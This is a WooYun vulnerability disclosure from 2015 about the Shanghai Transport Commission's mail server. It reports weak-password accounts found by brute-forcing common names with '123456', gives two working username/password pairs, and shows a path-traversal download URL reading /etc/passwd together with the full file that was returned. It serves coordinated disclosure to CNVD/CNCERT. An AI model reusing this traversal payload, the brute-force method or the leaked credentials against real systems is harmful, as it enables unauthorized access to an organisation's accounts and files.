当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0153060

漏洞标题:上海交通委员会邮箱弱口令及任意文件下载

相关厂商:上海交通委员会

漏洞作者: 路人甲

提交时间:2015-11-09 16:59

修复时间:2016-01-11 15:32

公开时间:2016-01-11 15:32

漏洞类型:敏感信息泄露

危害等级:中

自评Rank:10

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-11-09: 细节已通知厂商并且等待厂商处理中
2015-11-20: 厂商已经确认,细节仅向厂商公开
2015-11-30: 细节向核心白帽子及相关领域专家公开
2015-12-10: 细节向普通白帽子公开
2015-12-20: 细节向实习白帽子公开
2016-01-11: 细节向公众公开

简要描述:

详细说明:

http://**.**.**.**/
top500姓名爆破,密码:123456

j3.png


wangwei/123456
lixiaohong/123456


漏洞证明:

j1.png


j2.png


任意文件下载
http://**.**.**.**/file.php?Cmd=download&filename=../../../../../../etc/passwd&path=

# $FreeBSD: src/etc/master.passwd,v 1.39 2004/08/01 21:33:47 markm Exp $
#
root:*:0:0:Charlie &:/root:/bin/csh
toor:*:0:0:Bourne-again Superuser:/root:
daemon:*:1:1:Owner of many system processes:/root:/usr/sbin/nologin
operator:*:2:5:System &:/:/usr/sbin/nologin
bin:*:3:7:Binaries Commands and Source:/:/usr/sbin/nologin
tty:*:4:65533:Tty Sandbox:/:/usr/sbin/nologin
kmem:*:5:65533:KMem Sandbox:/:/usr/sbin/nologin
games:*:7:13:Games pseudo-user:/usr/games:/usr/sbin/nologin
news:*:8:8:News Subsystem:/:/usr/sbin/nologin
man:*:9:9:Mister Man Pages:/usr/share/man:/usr/sbin/nologin
sshd:*:22:22:Secure Shell Daemon:/var/empty:/usr/sbin/nologin
smmsp:*:25:25:Sendmail Submission User:/var/spool/clientmqueue:/usr/sbin/nologin
mailnull:*:26:26:Sendmail Default User:/var/spool/mqueue:/usr/sbin/nologin
bind:*:53:53:Bind Sandbox:/:/usr/sbin/nologin
proxy:*:62:62:Packet Filter pseudo-user:/nonexistent:/usr/sbin/nologin
_pflogd:*:64:64:pflogd privsep user:/var/empty:/usr/sbin/nologin
uucp:*:66:66:UUCP pseudo-user:/var/spool/uucppublic:/usr/local/libexec/uucp/uucico
pop:*:68:6:Post Office Owner:/nonexistent:/usr/sbin/nologin
www:*:80:80:World Wide Web Owner:/nonexistent:/usr/sbin/nologin
nobody:*:65534:65534:Unprivileged user:/nonexistent:/usr/sbin/nologin
msweichun:*:1001:0:User &:/home/msweichun:/bin/sh
alias:*:1002:1001:User &:/var/qmail/alias:/sbin/nologin
qmaild:*:1003:1001:User &:/var/qmail:/sbin/nologin
qmaill:*:1004:1001:User &:/var/qmail:/sbin/nologin
qmailp:*:1005:1001:User &:/var/qmail:/sbin/nologin
qmailq:*:1006:1002:User &:/var/qmail:/sbin/nologin
qmailr:*:1007:1002:User &:/var/qmail:/sbin/nologin
qmails:*:1008:1002:User &:/var/qmail:/sbin/nologin
vpopmail:*:1009:1003:User &:/usr/home/vpopmail:/sbin/nologin
mysql:*:88:88:MySQL Daemon:/nonexistent:/sbin/nologin
clamav:*:1010:1010:User &:/tmp:/sbin/nologin
qscand:*:1011:1011:User &:/tmp:/sbin/nologin
spamd:*:58:58:SpamAssassin user:/var/spool/spamd:/sbin/nologin


修复方案:

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:9

确认时间:2015-11-20 11:31

厂商回复:

CNVD未直接复现所述情况,已经转由CNCERT下发给上海分中心,由其后续协调网站管理单位处置。

最新状态:

暂无